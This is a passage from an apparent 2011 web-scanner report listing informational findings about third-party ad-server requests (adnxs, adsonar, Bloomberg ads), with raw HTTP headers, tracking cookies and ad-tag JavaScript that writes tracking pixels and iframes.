*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%4!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!jW8!!!!#=!=TL!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!!yaE!!!!#=!=TL!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!,=!=TL!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#M]c!!!!*=!=TL!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#Q+/!!!!#=!=TL!#Q+^!!!!#=!=TL!#Q+p!!!!#=!=TL!#RY.!!!!#=!=TL!#SCj!!!!,=!=TL!#SCk!!!!,=!=TL!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XA!!!!!#=!=TL!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZBw!!!!#=!=TL!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]W%!!!!#=!=TL!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a3k!!!!#=!=TL!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!,=!=TL!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!,=!=TL!#ec)!!!!%<x+rF!#f8c!!!!#=!=TL!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#gHm!!!!#=!=TL!#g[h!!!!#=!=TL!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p#H!!!!#=!=TL!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!,=!=TL!#usu!!!!,=!=TL!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!,=!=TL!#wYG!!!!$=!$J$!#wnK!!!!*=!=TL!#wnM!!!!*=!=TL!#wot!!!!#<xt>i!#xI*!!!!,=!=TL!#xIF!!!!/=!2<(!#yM#!!!!,=!=TL!$!!1!!!!#=!=TL!$!4(!!!!#=!=TL!$!4D!!!!#=!=TL!$!89!!!!#=!=TL!$!8o!!!!#=!=TL!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#E+!!!!#=!=TL!$#Fi!!!!#=!=TL!$#G4!!!!#=!=TL!$#M.!!!!#=!=TL!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#T!!!!!#=!=TL!$#T3!!!!#=!=TL!$#WA!!!!,=!=TL!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$%,!!!!!,=!=TL!$%,J!!!!#<x2wq!$%SB!!!!,=!=TL!$%c]!!!!#=!=TL!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$('#!!!!#=!=TL!$(>p!!!!#=!=TL!$(Gt!!!!/=!2<(!$(Qs!!!!#=!=TL!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$)qH!!!!#=!=TL!$*Q<!!!!#=!=TL!$*R!!!!!%<xr]Q!$*a0!!!!(=!=TL!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5!$,0h!!!!#=!=TL"; path=/; expires=Sat, 11-May-2013 11:39:30 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 11:39:30 GMT
Pragma: no-cache
Content-Length: 3659
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=n2ACCPDEggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=2dBwCMDggwIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="https://www.googleadservices.com/pagead/conversion/1033191019/?label=mxelCP2b-gEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=uk38CIiX0QEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=ZIPUCNDXggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=muhJCP2z9wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=WkdyCKXa-wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=nbI8CJjeggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=yfh4CPjKgwIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=6gplCPXJ6wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=6L6cCMC7ggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=RmcwCOXM6QEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=XFL7COWz7gEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=e-86CNDegwIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=0pAQCKDe0wEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=Dtp9CMW-4AEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=TUhzCKingwIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=ooGmCK2U7wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=3Nn5CODGggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=ZKywCJjtggIQjPe59AM&guid=ON&script=0" />');

19.10. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

19.11. http://ads.adsonar.com/adserving/getAds.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://ads.adsonar.com/adserving/getAds.jsp?previousPlacementIds=&placementId=1517620&pid=2277767&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network

The response contains the following link to another domain:

http://cdn.tacoda.at.atwola.com/an/qseg.html

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1517620&pid=2277767&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:08 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 14156

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
<td><iframe src="http://cdn.tacoda.at.atwola.com/an/qseg.html" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...

19.12. http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bloomberg.com
Path:	/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83

Issue detail

The page was loaded from a URL containing a query string:

http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83?http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&ALLTOP&SPNATOP&SPWWTOP&GENTOP&USTOP&OLYTOP&TOP&WWTOP&marketstatus1&&

The response contains the following links to other domains:

http://ad-emea.doubleclick.net/ad/N1379.290479.MEDIABUYER/B5191871;sz=88x31;ord=2052462841?
http://ad-emea.doubleclick.net/ad/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie4;abr=!ie5;sz=88x31;ord=600377597?
http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/600377597/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=600377597?
http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2052462841/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?;ord=2052462841?
http://ad-emea.doubleclick.net/adj/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/600377597/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=600377597?
http://ad.amtk-media.com/iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=
http://ad.amtk-media.com/iframe?spacedesc=2107090_1090554_300x600_1205077_2107090&target=_blank&@CPSC@=
http://ad.amtk-media.com/image?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y
http://ad.amtk-media.com/image?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y
http://ad.amtk-media.com/jscript?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/1587021916/x70/Bloomberg/3259241/3259241_.html/72634857383032345a51594144454b2b
http://ad.amtk-media.com/jscript?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/131253292/x60/Bloomberg/3259246/3259246_.html/72634857383032345a51594144454b2b
http://ad.doubleclick.net/ad/N5877.774.5057472001621/B5104260;sz=88x31;ord=323024100?
http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/323024100/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?;ord=323024100?
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/Bloomberg/2956629_BH/bannerad_animloop.gif/1285946185
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/Bloomberg/3259246/1x1_bw-no-show-ad.gif/1288893078
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif

Request

GET /adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83?http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&ALLTOP&SPNATOP&SPWWTOP&GENTOP&USTOP&OLYTOP&TOP&WWTOP&marketstatus1&& HTTP/1.1
Host: ads.bloomberg.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; __utma=30057196.790518761.1303930135.1303930135.1303930135.1; __utmv=30057196.|3=opt=no-opt=1,; rsi_segs=K05539_10529|K05539_10592; opt=no-opt

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8755
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'x24') {
document.write ('<A HREF="http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/1220895524/x24/default/empty.gif/72634857383032345a51594144454b2b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>');
}
if (position == 'x60') {
document.write ('<IFRAME id="x60_131253292" SRC="http://ad.amtk-media.com/iframe?spacedesc=2107090_1090554_300x600_1205077_2107090&target=_blank&@CPSC@=" WIDTH=300 HEIGHT=600 SCROLLING="No" FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0>\n');
document.write ('<SCRIPT SRC="http://ad.amtk-media.com/jscript?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/131253292/x60/Bloomberg/3259246/3259246_.html/72634857383032345a51594144454b2b"></SCRIPT>
...[SNIP]...
/x60/Bloomberg/3259246/3259246_.html/72634857383032345a51594144454b2bhttp://ad.amtk-media.com/click?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y" TARGET="_blank">\n');
document.write (' <IMG SRC="http://ad.amtk-media.com/image?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y" WIDTH=300 HEIGHT=600 ALT="Click Here" BORDER=0>\n');
document.write (' </A>
...[SNIP]...
/bloombergopt/news/sports/international/story/L44/542509375/x62/Bloomberg/3259246/3259246_1x1_bw-no-show-ad.gif.html/72634857383032345a51594144454b2b?__QUERY__" target="_blank"> \n');
document.write ('<img src="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/Bloomberg/3259246/1x1_bw-no-show-ad.gif/1288893078" border="0" \n');
document.write ('width="1" height="1" alt=""/></a> \n');
document.write ('\n');
}
if (position == 'x70') {
document.write ('<IFRAME id="x70_1587021916" SRC="http://ad.amtk-media.com/iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=" WIDTH=728 HEIGHT=90 SCROLLING="No" FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0>\n');
